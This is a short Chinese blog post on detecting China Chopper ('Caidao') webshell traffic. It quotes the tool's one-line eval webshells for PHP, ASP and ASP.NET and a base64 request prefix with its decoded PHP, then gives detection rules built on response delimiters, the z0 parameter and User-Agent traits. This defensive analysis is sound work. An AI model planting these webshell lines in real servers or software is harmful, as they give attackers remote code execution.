一、捕获菜刀流量
payload特征:
PHP: <?php @eval($_POST['caidao']);?> ASP: <%eval request(“caidao”)%> ASP.NET: <%@ Page Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>
数据包流量特征:
1、请求包中:ua头为百度,火狐
2、请求体中存在eavl,base64等特征字符
3、请求体中传递的payload为base64编码,并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J,解码出来是@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");

响应文的格式为
X@Y 结果 X@Y
二、分析特征
菜刀的流量由于没有进行加密,所以各类特征非常明显,以下规则均可以将菜刀进行识别
(1)响应里面存在->|作为响应正文的开头,响应的末尾以|<-结束
(2)请求正文部分至少存在@eavl(base64_decode($_POST[z0]));可以用来识别
(3)z0参数
菜刀流量识别与Web壳攻击特征分析

本文详细描述了菜刀流量的特征,包括PHP、ASP和ASP.NET中的payload示例,以及数据包的特征如ua头、eavl和base64编码。文章提供规则来识别菜刀流量的响应模式和编码形式,用于Webshell攻击检测。
最低0.47元/天 解锁文章

2174

被折叠的 条评论
为什么被折叠?



